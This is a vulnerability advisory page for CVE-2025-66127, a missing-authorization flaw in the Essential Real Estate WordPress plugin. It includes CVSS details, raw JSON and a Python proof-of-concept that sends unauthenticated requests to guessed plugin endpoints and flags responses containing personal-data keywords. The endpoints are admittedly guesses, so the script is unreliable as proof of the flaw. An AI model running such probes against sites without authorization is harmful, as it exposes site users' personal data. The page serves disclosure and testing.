Security Vulnerability Report
中文
CVE-2025-66127 CVSS 5.3 MEDIUM

CVE-2025-66127

Published: 2025-12-16 09:15:57
Last Modified: 2026-04-27 18:16:37

Description

Missing Authorization vulnerability in g5theme Essential Real Estate essential-real-estate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Real Estate: from n/a through <= 5.3.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Essential Real Estate Plugin <= 5.3.2
Essential Real Estate Plugin n/a through 5.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66127 PoC - Essential Real Estate Authorization Bypass # Target: WordPress site with Essential Real Estate plugin <= 5.3.2 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-66127 Missing Authorization vulnerability in Essential Real Estate plugin """ # Common endpoints that might be affected endpoints = [ '/wp-json/essential-real-estate/v1/', '/wp-json/essential-real-estate/v1/properties', '/wp-admin/admin-ajax.php', '/?rest_route=/essential-real-estate/v1/agents', '/wp-json/ere/v1/', ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-66127 - Essential Real Estate Authorization Bypass") vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Send unauthenticated request headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester/1.0', 'Content-Type': 'application/json' } try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if we get unauthorized access to sensitive data if response.status_code == 200: content = response.text # Check for sensitive data exposure if any(keyword in content.lower() for keyword in ['email', 'phone', 'address', 'user_id', 'agent']): print(f"[+] VULNERABLE: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response contains potentially sensitive data") vulnerable = True elif response.status_code == 200 and len(content) > 100: print(f"[!] Possible vulnerability at: {url}") print(f"[!] Status Code: {response.status_code}") print(f"[!] Response length: {len(content)} bytes") vulnerable = True except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") if vulnerable: print("\n[!] Target appears to be VULNERABLE to CVE-2025-66127") print("[!] Recommendation: Update Essential Real Estate plugin to latest version") else: print("\n[-] Target does not appear to be vulnerable") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-66127-poc.py <target_url>") print("Example: python cve-2025-66127-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66127", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:57.140", "lastModified": "2026-04-27T18:16:37.237", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in g5theme Essential Real Estate essential-real-estate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Real Estate: from n/a through <= 5.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/essential-real-estate/vulnerability/wordpress-essential-real-estate-plugin-5-2-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}